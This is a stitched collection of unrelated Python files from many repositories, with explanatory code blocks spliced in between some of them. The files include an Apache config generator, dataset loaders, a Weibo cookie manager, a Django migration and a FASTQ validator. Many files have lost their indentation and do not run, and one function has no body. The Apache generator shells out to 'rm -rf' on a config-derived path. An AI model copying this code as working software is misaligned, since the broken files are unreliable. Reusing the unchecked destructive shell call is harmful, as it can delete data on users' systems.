        proxies_pass = list()
        proxies_match = list()
        if proxies is not None:
            match_test = re.compile(r'.*[\[(^$].*')
            for _ in proxies:
                if match_test.match(_.split(' ')[0]):
                    proxies_match.append(_)
                else:
                    proxies_pass.append(_)
        return [proxies_pass, proxies_match]
    def dump_config(self):
        virtualhost_tpl = Template(
            open(self.config.wt_path + '/templates/apache/virtualhost.conf.jinja').read(),
            trim_blocks=True, lstrip_blocks=True)
        virtualhost_302_tpl = Template(
            open(self.config.wt_path + '/templates/apache/virtualhost-302.conf.jinja').read(),
            trim_blocks=True, lstrip_blocks=True)

        sites = self.config.get_config('sites')
        os.system(f'rm -rf {self.config.wt_config_path}/sites/*')

        for site in sites:
            site_config = sites.get(site)
            if site_config is None:
                continue

            path = site_config.get('path')
            public_path = site_config.get('public_path')
            custom = site_config.get('custom')
            aliases = site_config.get('alias')
            proxies = site_config.get('proxy')
            secure = site_config.get('secure')
            crt_path = f'{self.config.certificate_path}/{site}.crt'
            key_path = f'{self.config.certificate_path}/{site}.key'
            php_version = self.config.get_site_config('php/version', site)
            log_path = f'{self.config.wt_config_path}/log'

            if path is not None and not os.path.exists(path):
                continue

            server_name = f"{site}.test"
            if aliases is not None:
                aliases = ' '.join(aliases)

            proxies_pass, proxies_match = self.filter_proxies(proxies)

            public_html = str(path).rstrip('/')
            if public_path is not None:
                public_html += '/' + public_path

            virtualhost_tpl.stream(path='/var/www/html').dump(
                f'{self.config.wt_config_path}/sites/000-default.conf')
            virtualhost_tpl.stream(
                secure=True,
                path='/var/www/html',
                crt_path='/etc/ssl/certs/ssl-cert-snakeoil.pem',
                key_path='/etc/ssl/private/ssl-cert-snakeoil.key'
            ).dump(f'{self.config.wt_config_path}/sites/000-default-ssl.conf')

            if secure and os.path.exists(crt_path) and os.path.exists(key_path):
                virtualhost_302_tpl.stream(
                    server_name=server_name,
                    aliases=aliases).dump(f'{self.config.wt_config_path}/sites/{site}.conf')
                virtualhost_tpl.stream(
                    site_id=site,
                    log_path=log_path,
                    path=public_html,
                    server_name=server_name,
                    proxies_pass=proxies_pass,
                    proxies_match=proxies_match,
                    secure=secure,
                    crt_path=crt_path,
                    key_path=key_path,
                    custom=custom,
                    aliases=aliases,
                    php_version=php_version).dump(f'{self.config.wt_config_path}/sites/{site}-ssl.conf')
            else:
                virtualhost_tpl.stream(
                    site_id=site,
                    path=public_html,
                    log_path=log_path,
                    server_name=server_name,
                    proxies_pass=proxies_pass,
                    proxies_match=proxies_match,
                    custom=custom,
                    aliases=aliases,
                    php_version=php_version).dump(f'{self.config.wt_config_path}/sites/{site}.conf')
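The routing rule in `filter_proxies` above — entries whose first token contains a regex metacharacter go to the match list (presumably destined for `ProxyPassMatch`-style rules), everything else to the plain pass list — can be exercised standalone. The name `split_proxies` below is illustrative, not part of wt_plus:

```python
import re

# Standalone sketch of the filter_proxies() routing: a proxy entry whose first
# token contains one of [, (, ^ or $ is treated as a regex-style rule.
MATCH_TEST = re.compile(r'.*[\[(^$].*')

def split_proxies(proxies):
    proxies_pass, proxies_match = [], []
    for entry in proxies or []:
        if MATCH_TEST.match(entry.split(' ')[0]):
            proxies_match.append(entry)
        else:
            proxies_pass.append(entry)
    return proxies_pass, proxies_match

plain, matched = split_proxies(['/api http://127.0.0.1:8000',
                                '^/ws(.*) ws://127.0.0.1:9000'])
print(plain)    # → ['/api http://127.0.0.1:8000']
print(matched)  # → ['^/ws(.*) ws://127.0.0.1:9000']
```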

# ===========================================================================
# File: observations/r/edc_t.py  (repo: hajime9652/observations, Apache-2.0)
# ===========================================================================
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import csv
import numpy as np
import os
import sys

from observations.util import maybe_download_and_extract


def edc_t(path):
  """EPICA Dome C Ice Core 800KYr Temperature Estimates

  Temperature record, using Deuterium as a proxy, from the EPICA (European
  Project for Ice Coring in Antarctica) Dome C ice core covering 0 to 800
  kyr BP.

  A data frame with 5788 observations on the following 5 variables.

  `Bag`
      Bag number
  `ztop`
      Top depth (m)
  `Age`
      Years before 1950
  `Deuterium`
      Deuterium dD data
  `dT`
      Temperature difference from the average of the last 1000 years,
      ~ -54.5degC

  http://www.ncdc.noaa.gov/paleo/icecore/antarctica/domec/domec_epica_data.html

  Args:
    path: str.
      Path to directory which either stores file or otherwise file will
      be downloaded and extracted there.
      Filename is `edc_t.csv`.

  Returns:
    Tuple of np.ndarray `x_train` with 5788 rows and 5 columns and
    dictionary `metadata` of column headers (feature names).
  """
  import pandas as pd
  path = os.path.expanduser(path)
  filename = 'edc_t.csv'
  if not os.path.exists(os.path.join(path, filename)):
    url = 'http://dustintran.com/data/r/DAAG/edcT.csv'
    maybe_download_and_extract(path, url,
                               save_file_name='edc_t.csv',
                               resume=False)

  data = pd.read_csv(os.path.join(path, filename), index_col=0,
                     parse_dates=True)
  x_train = data.values
  metadata = {'columns': data.columns}
  return x_train, metadata

# ===========================================================================
# File: scapy_fix.py  (repo: ZooAtmosphereGroup/HelloPackages, Apache-2.0)
# ===========================================================================
from astroid import MANAGER, register_module_extender
from astroid.builder import AstroidBuilder

CODE_FIX = """
class IP(object): pass
class TCP(object): pass
class UDP(object): pass

class traceroute(object):
    def __init__(domain, dport=80, maxttl=1):
        pass
"""


def scapy_transform():
    return AstroidBuilder(MANAGER).string_build(CODE_FIX)


def register(linter):
    register_module_extender(MANAGER, 'scapy.all', scapy_transform)

# ===========================================================================
# File: exercises/es/test_01_02_02.py  (repo: Jette16/spacy-course, MIT)
# ===========================================================================
def test():
    import spacy.tokens
    import spacy.lang.de

    assert isinstance(
        nlp, spacy.lang.de.German
    ), "The nlp object should be an instance of the German class."
    assert isinstance(
        doc, spacy.tokens.Doc
    ), "Did you process the text with the nlp object to create a doc?"
    assert "print(doc.text)" in __solution__, "Did you print doc.text?"

    __msg__.good("Sehr gut! :)")

# ===========================================================================
# File: TLDKConstants.py  (repo: preym17/csit, Apache-2.0)
# ===========================================================================
# Copyright (c) 2017 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file defines the constants variables for the TLDK test."""
class TLDKConstants(object):
"""Define the directory path for the TLDK test."""
# TLDK testing directory location at topology nodes
REMOTE_FW_DIR = '/tmp/TLDK-testing'
# Shell scripts location
TLDK_SCRIPTS = 'tests/tldk/tldk_scripts'
# Libraries location
TLDK_DEPLIBS = 'tests/tldk/tldk_deplibs'
# Config files location for the TLDK test
TLDK_TESTCONFIG = 'tests/tldk/tldk_testconfig'

# ===========================================================================
# File: comsyl/utils/Logger.py  (repo: s-sajid-ali/comsyl, MIT)
# ===========================================================================
# coding: utf-8
# /*##########################################################################
#
# Copyright (c) 2017 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
__authors__ = ["M Glass - ESRF ISDD Advanced Analysis and Modelling"]
__license__ = "MIT"
__date__ = "20/04/2017"
import time
from comsyl.parallel.utils import isMaster
import sys
class Logger(object):
def __init__(self):
self.resetLog()
def resetLog(self):
self._total_log = []
def log(self, log_string):
if isMaster():
self.logAll(log_string)
def logAll(self, log_string):
output = "[%s] %s" %(time.strftime("%Y-%m-%d %H:%M:%S"), log_string)
print(output)
self._total_log.append(output)
sys.stdout.flush()
def totalLog(self):
return "\n".join(self._total_log)
logger = Logger()
def log(log_string):
logger.log(log_string)
def logAll(log_string):
logger.logAll(log_string)
def getTotalLog():
return logger.totalLog()
def resetLog():
logger.resetLog()
def logProgress(n_max, n_current, process):
try:
if n_current%(int(n_max*0.02)) == 0:
log("%s: %i / %i " % (process, n_current+1, n_max))
except ZeroDivisionError:
log("%s: %i" % (process, n_current+1))
#!/usr/bin/env python
# File: python/iterables-and-iterators/sol.py (repo: natebwangsut/hackerrank, license: MIT)
"""
Hackerrank Solution
-
Nate B. Wangsutthitham
<@natebwangsut | nate.bwangsut@gmail.com>
"""
__author__ = "Nate B. Wangsutthitham"
__credits__ = ["Nate B. Wangsutthitham"]
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = "Nate B. Wangsutthitham"
__email__ = "nate.bwangsut@gmail.com"
import itertools
line = input()  # first line holds the element count, which is not needed here
line = input().split()
repeat = int(input())
com = list(itertools.combinations(line, repeat))
print(sum(("a" in x) for x in com) / len(com))
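
# The last two lines compute the probability that a randomly chosen size-k
# combination contains the letter 'a'. The same computation on a small,
# hand-checkable input:
```python
import itertools

letters = ['a', 'a', 'c', 'd']
k = 2
com = list(itertools.combinations(letters, k))
# combinations() works by index, so the two 'a's are distinct: six pairs in
# total, and only ('c', 'd') lacks an 'a'.
prob = sum(('a' in c) for c in com) / len(com)
print(prob)  # 5/6 = 0.8333333333333334
```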
# File: app/exception.py (repo: hggffhhfg/project_clever, license: MIT)
class TimeInBedLessSleepError(Exception):
    """Raised when the time spent in bed is less than the sleep time."""
    pass
class NonUniqueNotationDate(Exception):
    """Raised when importing a file of records finds a record whose date
    already exists in the sleep diary / database."""
    pass
Errors = {
    'add': 'An error occurred while adding a record to the diary',
    'update': 'An error occurred while updating a record in the diary',
    'value': 'Invalid value',
    'syntax': 'Invalid format',
    'type': 'Invalid data type',
    'database': 'An error occurred while accessing the database',
    'file': 'File not found',
    'import': 'An error occurred during import',
    'other': 'Other error'
}
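
# A sketch of how TimeInBedLessSleepError would guard a diary entry. The
# sleep_efficiency helper is hypothetical (not part of this app), and the
# stand-in class mirrors the one defined above.
```python
class TimeInBedLessSleepError(Exception):
    """Stand-in mirroring the exception defined above."""

def sleep_efficiency(time_in_bed_min, sleep_min):
    # Reject physically impossible entries before computing the ratio
    if time_in_bed_min < sleep_min:
        raise TimeInBedLessSleepError("time in bed is less than sleep time")
    return sleep_min / time_in_bed_min

print(sleep_efficiency(480, 420))  # 0.875
```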
# File: Operation/Sub.py (repo: janvi16/-HACKTOBERFEST2K20, license: Apache-2.0)
# Python program to subtract two numbers using a function
def subtraction(x, y):  # function definition for subtraction
    sub = x - y
    return sub
num1 = int(input("please enter first number: "))  # input from user to num1
num2 = int(input("please enter second number: "))  # input from user to num2
print("Subtraction is: ", subtraction(num1, num2))  # call the function
# File: workplanner/fields.py (repo: pavelmaksimov/work-planner, license: Apache-2.0)
from typing import Optional
import peewee
import pendulum
from workplanner.utils import normalize_datetime, strftime_utc
class DateTimeUTCField(peewee.DateTimeField):
def python_value(self, value: str) -> Optional[pendulum.DateTime]:
if value is not None:
return pendulum.parse(value, tz=pendulum.timezone("UTC"))
return None
def db_value(self, value: Optional[pendulum.DateTime]) -> Optional[str]:
if value is not None:
value = normalize_datetime(value)
if value.tzinfo is None:
raise ValueError(f"{value} timezone not set.")
value = strftime_utc(value)
return value
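
# The behaviour of db_value can be sketched with only the standard library
# (no peewee/pendulum). The output format string here is an assumption; the
# real one lives in workplanner.utils.strftime_utc.
```python
from datetime import datetime, timezone, timedelta

def to_utc_string(value):
    # Like db_value above: refuse naive datetimes, normalize to UTC,
    # then serialize to text for storage.
    if value.tzinfo is None:
        raise ValueError("%s timezone not set." % value)
    return value.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S")

msk = timezone(timedelta(hours=3))
print(to_utc_string(datetime(2021, 1, 1, 12, 0, tzinfo=msk)))  # 2021-01-01 09:00:00
```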
# File: wagtail_to_ion/templatetags/content_type_description.py (repo: anfema/wagtail_to_ion, license: MIT)
from collections import namedtuple
from django import template
from wagtail_to_ion.models import get_ion_content_type_description_model
register = template.Library()
@register.simple_tag
def content_type_description(app_label, model_name, verbose_name):
ContentTypeDescription = get_ion_content_type_description_model()
content_type_description = namedtuple("content_type_description", ["description", "image_url"])
image_path = None
try:
description_object = ContentTypeDescription.objects.get(content_type__app_label=app_label, content_type__model=model_name)
except ContentTypeDescription.DoesNotExist:
description_object = None
if description_object:
if description_object.example_image:
image_path = description_object.example_image.url
return content_type_description(description_object.description, image_path)
else:
return content_type_description('Page of type "{}"'.format(verbose_name), None)
# File: src/ukw_intelli_store/__init__.py (repo: Maddonix/ukw-intelli-store, license: MIT)
'''
Package to read and process material export data.
To use, instantiate an EndoMaterial object and start exploring!
---------
Examples:
## Init
from ukw_intelli_store import EndoMaterial
em = EndoMaterial(path, path)
## To explore all used materials:
em.mat_info
## To explore specific material id
em.get_mat_info_for_id(material_id)
## To get all logged dgvs keys:
em.get_dgvs_keys()
## To explore a single dgvs key:
em.get_dgvs_key_summary()
'''
__version__ = '0.0.0'
# File: weibospider/WeiboCookies.py (repo: cirlmcesc/weibo-userdata-crawler, license: MIT)
# -*- coding: utf-8 -*-
""" weibo login """
import json
import os
import logging
import requests
from weibospider.WeiboAccounts import accounts
logger = logging.getLogger(__name__)
def getCookies(username, password):
    """ Log in with a single account and return its cookies """
def getAllAccountsCookies(rconn):
    """ Log every account in and store the resulting cookies in redis """
    for account in accounts:
        key, username, password = "Spider:Cookies:%s--%s" % (account[0], account[1]), account[0], account[1]
        if rconn.get(key) is None:
            rconn.set(key, getCookies(username, password))
if "".join(rconn.keys()).count("Spider:Cookies") == 0:
logger.warning('None cookies, Stopping...')
os.system("pause")
def resetCookies(rconn, accounttext):
    """ Re-fetch and store the cookies for one account """
    username = accounttext.split("--")[0]
    password = accounttext.split("--")[1]
    rconn.set("Spider:Cookies:%s" % accounttext, getCookies(username, password))
    logger.warning("The cookie of %s has been updated successfully!" % accounttext)
def removeCookies(rconn, accounttext):
    """ Delete the stored cookies for one account """
    rconn.delete("Spider:Cookies:%s" % accounttext)
    logger.warning("The cookie of %s has been deleted successfully!" % accounttext)
# File: website/tests/test_practical_info.py (repo: laudrup/ebbamaala, license: MIT)
from unittest import mock
from urllib.parse import urlencode
from django.conf import settings
from django.contrib.auth import get_user_model
from django.test import TestCase
from website.models import PracticalInfo
class PracticalInfoViewTests(TestCase):
def setUp(self):
User = get_user_model()
self.user = User.objects.create_user('bobby', 'littlebobby@gmail.com', 'tables')
def test_not_logged_in(self):
response = self.client.get('/info')
url = "{}?{}".format(settings.LOGIN_URL, urlencode({'next': '/info'}))
self.assertRedirects(response, url)
@mock.patch('website.views.logger')
def test_no_info(self, mock_logger):
self.client.login(username='bobby', password='tables')
response = self.client.get('/info')
self.assertEqual(404, response.status_code)
mock_logger.warning.assert_called_with('No practical info added')
def test_practical_info_added(self):
practical_info_content = b'The moose is on the loose'
PracticalInfo.objects.create(content=practical_info_content)
self.client.login(username='bobby', password='tables')
response = self.client.get('/info')
self.assertEqual(200, response.status_code)
self.assertIn(practical_info_content, response.content)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: library/templexer.py (repo: K4zuki/tempcommand, license: Apache-2.0)
# Copyright (c) 2016 Kazuki Yamamoto
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the
# following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import shlex
import pprint
def serialize_loop(arg):
__tok, idx, cmd, arg = arg
arg = arg.strip("{}();")
arg = arg.split(":")
# print arg
_cmd = arg[0]
_arg = arg[1:]
__arg = [[], ]
while(_arg):
__arg.append(_arg.pop().split(','))
__arg.reverse()
__arg.pop()
# print "__arg = ",__arg
# print "len(__arg) = ",len(__arg)
_stack = []
inloop = []
for i, command in enumerate(__tok, start=idx):
cmd = command[0]
arg = command[1]
inloop.append([cmd, arg])
# print "%03d"%i,cmd+arg
# inloop = "".join(inloop)
cmdtype = len(__arg)
if(cmdtype == 3):
for _, val in enumerate(__arg[2]):
for _, _val in enumerate(__arg[1]):
for _, __val in enumerate(__arg[0]):
_stack.append([_cmd, ":".join([__val, _val, val])])
_stack.extend(inloop)
# print "%s(%s:%s:%s);%s" %(
# _cmd,
# ",".join(str(__val)),
# _val,
# val,inloop
# ),
# print
elif(cmdtype == 2):
for _, _val in enumerate(__arg[1]):
for _, __val in enumerate(__arg[0]):
_stack.append([_cmd, ":".join([__val, _val])])
# print pprint.pprint(_stack)
_stack.extend(inloop)
# print "%s(%s:%s);%s" %(
# _cmd,
# __val,
# _val,inloop
# ),
# print
elif(cmdtype == 1):
for _, __val in enumerate(__arg[0]):
_stack.append([_cmd, __val])
_stack.extend(inloop)
# print "%s(%s);%s" %(
# _cmd,
# __val,inloop
# )
# print "_stack = ",
# print pprint.pprint(_stack)
return _stack
# callback[ cmd ]( (None, 0, _cmd, _arg ))
def parse(script="eof"):
_tok = []
__tok = []
_for = []
ret = []
tokens = shlex.shlex(script.upper())
while(True):
tok = tokens.get_token()
if (not tok) or (tok == "EOF"):
break
else:
# print tok
_tok.append(tok)
if(tok == "{" or tok == ";"):
__tok.append([_tok[0], "".join(_tok[1:])])
_tok = []
if(tok == "}"):
# _f = []
_for = []
# _for.append([_tok[0],"".join(_tok[1:])])
while not (__tok[-1][0] == "FOR"):
# print __tok[-1]
_for.append(__tok.pop())
_f = __tok.pop()
# print pprint.pprint(_for)
# print _f
_for.reverse()
__tok.extend(serialize_loop((_for, 0, _f[0], _f[1])))
# print pprint.pprint(__tok)
_tok = []
# print pprint.pprint(__tok)
try:
for i, command in enumerate(__tok):
cmd = command[0]
arg = command[1]
# print cmd,arg
ret.append(str(callback[cmd](arg)))
finally:
return ret
callback = {}
# add_command
# adds a command and its callback function as a dictionary pair
# @param command command name; must be upper-case
# @param func callback function; should be started with '_'
def add_command(command, func):
callback[command] = func
def nop(arg):
arg = arg.strip("{}();")
arg = arg.split(":")
    print(arg)
add_command("NOP", nop)
def reg(arg):
arg = arg.strip("{}();")
arg = arg.split(":")
    print(arg)
add_command("REG", reg)
def suspend(arg):
arg = arg.strip("{}();")
arg = arg.split(":")
print(" SUSPEND: press return to continue ".center(80, "#"))
    input()
add_command("SUSPEND", suspend)
# add_command("NOP",nop)
# add_command("REG",reg)
add_command("UREG", reg)
add_command("CHAN", reg)
add_command("BASE", reg)
add_command("UBASE", reg)
add_command("TEMP", reg)
add_command("DELY", reg)
add_command("SAMPLE", reg)
# add_command("SUSPEND",suspend)
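
# The core of serialize_loop -- replaying the loop body once per combination
# of the loop header's argument lists -- can be restated compactly with
# itertools.product. This is a behavioural sketch, not the parser itself.
```python
import itertools

def expand_loop(cmd, arg_groups, body):
    # Emit one loop-header command per combination of the argument lists
    # (last group varies slowest, matching serialize_loop above), each
    # followed by a full copy of the loop body.
    expanded = []
    for combo in itertools.product(*reversed(arg_groups)):
        expanded.append([cmd, ":".join(reversed(combo))])
        expanded.extend(body)
    return expanded

result = expand_loop("REG", [["1", "2"], ["A"]], [["NOP", "()"]])
print(result)  # [['REG', '1:A'], ['NOP', '()'], ['REG', '2:A'], ['NOP', '()']]
```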
# File: kimsta/migrations/0002_auto_20211208_1726.py (repo: Evan-cell/instagram, license: Unlicense)
# Generated by Django 3.2.7 on 2021-12-08 14:26
import cloudinary.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('kimsta', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='posts',
name='caption',
),
migrations.RemoveField(
model_name='posts',
name='posted',
),
migrations.AddField(
model_name='posts',
name='like_count',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='posts',
name='liked',
field=models.ManyToManyField(blank=True, default=None, related_name='liked', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='posts',
name='post_date',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='posts',
name='user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='images', to=settings.AUTH_USER_MODEL),
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('profile_photo', cloudinary.models.CloudinaryField(max_length=255, verbose_name='image')),
('bio', models.TextField(blank=True, max_length=500, null=True)),
('contact', models.CharField(blank=True, max_length=50, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Likes',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.CharField(choices=[('Like', 'Like'), ('Dislike', 'Dislike')], default='like', max_length=10)),
('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='kimsta.posts')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment', models.CharField(max_length=250)),
('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='kimsta.posts')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to=settings.AUTH_USER_MODEL)),
],
),
]
#!/usr/bin/env python
# File: python/taskmda/mda/svc/generate_entity_ngrams.py (repo: jiportilla/ontology, license: MIT)
# -*- coding: UTF-8 -*-
import os
import pprint
from base import BaseObject
from base import FileIO
from base import MandatoryParamError
class GenerateEntityNgrams(BaseObject):
def __init__(self,
ontology_name: str,
some_labels: list,
some_patterns: dict,
is_debug: bool = False):
"""
Updated:
1-Aug-2017
craig.trim@ibm.com
* added output-file param so this can be controlled by orchestrating service
<https://github.ibm.com/abacus-implementation/Abacus/issues/1721#issuecomment-3069168>
Updated:
21-Feb-2019
craig.trim@ibm.com
* migrated to text
Updated:
28-Mar-2019
craig.trim@ibm.com
* updated to add labels and patterns
Updated:
13-Dec-2019
craig.trim@ibm.com
* add ontology-name as a param
https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1583
"""
BaseObject.__init__(self, __name__)
if not some_labels:
raise MandatoryParamError("Labels")
if not some_patterns:
raise MandatoryParamError("Patterns")
self._is_debug = is_debug
self._labels = some_labels
self._patterns = some_patterns
self._ontology_name = ontology_name
def process(self):
from taskmda.mda.dmo import GenericTemplateAccess
from taskmda.mda.dmo import EntityNgramDictGenerator
from taskmda.mda.dto import KbNames
from taskmda.mda.dto import KbPaths
dictionary = EntityNgramDictGenerator().process(self._labels,
list(self._patterns.values()))
the_json_result = pprint.pformat(dictionary, indent=4)
the_json_result = "{0} = {{\n {1}".format(
KbNames.entity_ngrams(), the_json_result[1:])
the_template_result = GenericTemplateAccess.process()
the_template_result = the_template_result.replace(
"CONTENT", the_json_result)
path = os.path.join(os.environ["CODE_BASE"],
KbPaths.ngrams(ontology_name=self._ontology_name))
FileIO.text_to_file(path, the_template_result)
return dictionary
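
# The generator's core move -- pretty-print a dict and bind it to a module
# variable to produce importable Python source -- reduces to a few lines.
# A sketch only: the real code loads a template via GenericTemplateAccess
# and takes the variable name from KbNames.
```python
import pprint

def render_module(var_name, dictionary):
    # Pretty-print the dict and bind it to a module-level variable,
    # producing importable Python source text.
    return "%s = %s\n" % (var_name, pprint.pformat(dictionary, indent=4))

source = render_module("entity_ngrams", {"deep learning": ["deep", "learning"]})
print(source)  # entity_ngrams = {'deep learning': ['deep', 'learning']}
```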
#!@interpreter@
# File: modules/core/dbshell/dbshell.py (repo: petabyteboy/nixcloud-webservices, license: MIT)
import os
from pwd import getpwnam
from argparse import ArgumentParser
DBSHELL_CONFIG = @dbshellConfig@ # noqa
WEBSERVICES_PREFIX = "/var/lib/nixcloud/webservices"
def run_shell(dbname, user, command):
os.setuid(getpwnam(user).pw_uid)
os.execl(command, command, user, dbname)
def determine_wsname():
rel_to_ws_dir = os.path.relpath(os.getcwd(), WEBSERVICES_PREFIX)
components = rel_to_ws_dir.split(os.sep, 1)
if len(components) != 2:
return None
wsname_canidate = components[0]
if wsname_canidate in [os.curdir, os.pardir]:
return None
if wsname_canidate not in DBSHELL_CONFIG:
return None
return wsname_canidate
if __name__ == '__main__':
desc = "Connect to a database within a web service instance"
parser = ArgumentParser(description=desc)
parser.add_argument("webservice_name", nargs='?',
help="The web service name. If the argument is"
" omitted, the service name is determined"
" by inspecting the current directory.")
parser.add_argument("database", help="The database name to connect to.")
options = parser.parse_args()
if options.webservice_name is None:
wsname = determine_wsname()
if wsname is None:
parser.error("Unable to determine web service name.")
elif options.webservice_name not in DBSHELL_CONFIG:
msg = "Web service {!r} does not exist."
parser.error(msg.format(options.webservice_name))
else:
wsname = options.webservice_name
wsdef = DBSHELL_CONFIG[wsname]
if options.database not in wsdef:
msg = "Database {!r} does not exist for web service {!r}."
parser.error(msg.format(options.database, wsname))
else:
run_shell(options.database, **wsdef[options.database])
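
# The directory-based lookup in determine_wsname can be exercised in
# isolation. A sketch assuming POSIX paths; known_services plays the role
# of DBSHELL_CONFIG.
```python
import os

PREFIX = "/var/lib/nixcloud/webservices"

def wsname_from_cwd(cwd, known_services):
    # First path component of cwd relative to the prefix, but only when
    # cwd is genuinely inside a known service directory.
    parts = os.path.relpath(cwd, PREFIX).split(os.sep, 1)
    if len(parts) != 2 or parts[0] in (os.curdir, os.pardir):
        return None
    return parts[0] if parts[0] in known_services else None

print(wsname_from_cwd("/var/lib/nixcloud/webservices/blog/www", {"blog"}))  # blog
print(wsname_from_cwd("/tmp/elsewhere", {"blog"}))                          # None
```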
# File: validator/fastq.py (repo: rdgoite/fastq-validation, license: Apache-2.0)
class Validator:
PLUS_CHAR = 43
AT_CHAR = 64
def __init__(self):
self.validation_results = None
self.sequence_symbols = list()
for symbol in "ACTGN.":
self.sequence_symbols.append(ord(symbol))
self.quality_score_symbols = list()
        for symbol in ("!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                       "[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"):
            self.quality_score_symbols.append(ord(symbol))
def validate(self, file_path):
valid = True
with open(file_path, 'rb') as source:
record = list()
for line in source:
if not valid:
break
line = line.rstrip()
line_is_not_empty = line # added for readability
if line_is_not_empty:
record.append(line)
record_is_ready = len(record) == 4
if record_is_ready:
valid = valid and self._validate_record(record)
record.clear()
else:
valid = False
valid = valid and len(record) == 0
return valid
def _validate_record(self, record):
valid_identifier = self._validate_identifier_line(record[0])
valid_bases = self._validate_bases(record[1])
valid_plus = self._validate_plus(record[2])
valid_quality_scores = self._validate_quality_scores(record[3])
equal_lengths = self._validate_bases_length_equals_qc_length(record[1], record[3])
return valid_identifier and valid_bases and valid_plus and valid_quality_scores \
and equal_lengths
def _validate_identifier_line(self, line):
# is the first char @ ?
has_at_char = line[0] == Validator.AT_CHAR
# all ascii chars?
all_ascii = Validator._all_ascii(line)
return has_at_char and all_ascii
#TODO implement case insensitive check
    def _validate_bases(self, line):
        # a line is valid when every symbol is a recognised base and the
        # sequence does not mix 'N' with '.' (the original assigned `valid`
        # fresh on each iteration, so only the last symbol was checked)
        has_n_char = False
        has_period = False
        for symbol in line:
            if symbol not in self.sequence_symbols:
                return False
            if symbol == ord("N"):
                has_n_char = True
            if symbol == ord("."):
                has_period = True
        return not (has_n_char and has_period)
def _validate_plus(self, line):
# is the first char a plus sign?
has_plus_char = line[0] == Validator.PLUS_CHAR
return has_plus_char
def _validate_quality_scores(self, line):
for symbol in line:
if symbol not in self.quality_score_symbols:
                return False
return True
def _validate_bases_length_equals_qc_length(self, base_line, qc_line):
base_length = len(base_line)
quality_length = len(qc_line)
return base_length == quality_length
@staticmethod
def _all_ascii(line):
for char in line:
            # ASCII code points are 0-127
            if char > 127:
return False
return True
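
# A minimal sketch of how the four-line FASTQ record rules above apply,
# mirroring the Validator's byte-level checks on one hypothetical record
# (the identifier and sequence data below are made up for illustration):
#
# record = [
#     b"@SEQ_ID_001",   # identifier: must start with '@', ASCII only
#     b"GATTTGGGGN",    # bases: A, C, T, G plus N or '.' for unknowns
#     b"+",             # separator: must start with '+'
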